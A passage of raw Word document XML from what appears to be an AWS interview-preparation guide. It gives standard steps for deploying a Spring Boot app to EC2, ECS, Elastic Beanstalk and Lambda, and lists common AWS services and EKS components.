    <w:p w14:paraId="59199CC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46A1972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account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40317B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2 instance (Linux/Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45561C0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key pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D83A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13021A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the App:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E875C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gradlew build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E5553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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0418C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vn clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3710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Connect to EC2 via SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41928D9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i "your-key.pem" ec2-user@your-ec2-public-ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4E22E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Java if not present:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069EFF3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udo yum install java-17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB0E8D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Upload the JAR file using SCP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E286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cp -i "your-key.pem" target/app.jar ec2-user@your-ec2-ip:/home/ec2-user/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124844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un the app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796A198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java -jar app.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76630A3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BB428D">
          <v:rect id="_x0000_i3706" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="508BD1A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Deploying Dockerized Service to AWS ECS (Elastic Container Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF695EA"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74E1E5D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installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193BF7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CLI configured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8258C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R repository created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9407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0D002B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Build Docker Image:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A98178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build -t my-service .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CBC9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ag and Push to AWS ECR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFDE81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ecr get-login-password | docker login --username AWS --password-stdin &lt;aws_account_id&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABDF48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tag my-service &lt;aws_account_id&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com/my-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745BAD9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push &lt;aws_account_id&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com/my-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FA1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CS Cluster and Service (Fargate or EC2 launch type)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS Console</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set up task definitions and deploy the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647F7F39"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4C987">
          <v:rect id="_x0000_i3707" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A409E5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eploying via AWS Elastic Beanstalk (PaaS for apps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C06B03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7A3148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EB CLI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26587F0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ip install awsebcli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0EEC0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itialize Beanstalk project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53821F1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init -p java-17 spring-boot-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE84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nvironment and deploy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764DAFE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create spring-env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6148E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deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383734B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423A0">
          <v:rect id="_x0000_i3708" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE260D"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Deploying via AWS Lambda (For serverless apps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233684D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7D92BD7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functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C43A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Lightweight APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173BE5B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6FE755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Write handler function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B976D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and upload ZIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E10FFF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Lambda function from Console or CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D390CE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rigger via API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D399DD" w14:textId="7EDABF32"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709" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE19AB" w14:textId="7F1986AA" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="003002AA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="913" w:name="_Toc197868127"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which services have you used</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="913"/>
    </w:p>
    <w:p w14:paraId="13BBF76F" w14:textId="20CB48AF" w:rsidR="00604ADF" w:rsidRPr="00C632D7" w:rsidRDefault="00604ADF"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Here’s a list of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS services commonly used in real-world projects</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, especially for Java Spring Boot &amp; microservices applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D100CAE"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92B89">
          <v:rect id="_x0000_i3710" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC34142"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ompute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAB56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2 (Elastic Compute Cloud)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To host Spring Boot apps on virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F7C75"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S (Elastic Container Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For containerized microservices using Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC63B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KS (Elastic Kubernetes Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For orchestrating containers with Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF28EC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Lambda</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For serverless functions (lightweight tasks, event-based processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D5DA9"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AF7F4B2">
          <v:rect id="_x0000_i3711" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDEFAA8"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4842C5D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3 (Simple Storage Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For storing files, logs, images, backups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC958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Elastic Block Store)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Persistent storage for EC2 volumes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF166BD"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326E9">
          <v:rect id="_x0000_i3712" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FF1C73"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Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F3660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DS (Relational Database Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Managed PostgreSQL, MySQL, Oracle, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9E1D39"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DynamoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: NoSQL database for fast, scalable data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD3BEC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urora</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: High-performance, MySQL/PostgreSQL-compatible database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B363C"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A86EBF">
          <v:rect id="_x0000_i3713" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C5007"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 &amp; Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346C0C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Virtual Private Cloud)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Isolated network environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F9BB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urity Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Firewall rules for EC2/ECS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE6A57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Identity and Access Management)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: User and role permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67D6A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LB (Application Load Balancer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Load balancing for ECS/EC2 services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A26C2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oute 53</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Domain registration and DNS routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C09CF"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D4E69">
          <v:rect id="_x0000_i3714" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1046B"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19035BE2"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w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitoring, logs, metrics, alarms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8ACD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X-Ray</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Distributed tracing for microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C8A3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Trail</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Auditing and activity logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528FBB25"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5CE63">
          <v:rect id="_x0000_i3715" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B5FBE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2264EC0B"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r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: CI/CD pipeline automation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C02AC1"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Build</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Build and test code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B34EFE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Deploy</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automated deployment to EC2, ECS, Lambda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E436D4"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874D">
          <v:rect id="_x0000_i3716" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618288C"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essaging &amp; Eventing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D8724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QS (Simple Queue Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Decoupled messaging between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A4EB74"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NS (Simple Notification Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Publish-subscribe messaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E99D13"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ventBridge</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Event-driven architecture integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1F774" w14:textId="0EF11BFE"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717" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BE9C1E" w14:textId="402BD426" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="003002AA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="914" w:name="_Toc197868128"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are different services in EKS</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="914"/>
    </w:p>
    <w:p w14:paraId="22ACDD70" w14:textId="49A6DF78" w:rsidR="00DF08E6" w:rsidRPr="00C632D7" w:rsidRDefault="00DF08E6" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Amazon EKS (Elastic Kubernetes Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, various Kubernetes-native services are available and integrated to manage and deploy containerized applications efficiently. Below is a breakdown of key services and components involved in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EKS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7CDB4"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83DE7">
          <v:rect id="_x0000_i3718" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B6AB1"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ntrol Plane (Managed by AWS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5818C07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manages this part for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489DAAD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apiserver</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Front door to the cluster, processes API requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AEF63B"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tcd</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Key-value store backing Kubernetes state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A291B43"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scheduler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Schedules pods to appropriate nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2607AD6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controller-manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages controllers like replication, endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F94675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 Controller Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interfaces with AWS infrastructure (e.g., ELB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D5869"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76A6">
          <v:rect id="_x0000_i3719" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71458B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Worker Nodes (EC2 Instances or Fargate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141451D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Where your containers run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A947EF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an be managed EC2 nodes or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>serverless with Fargate</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
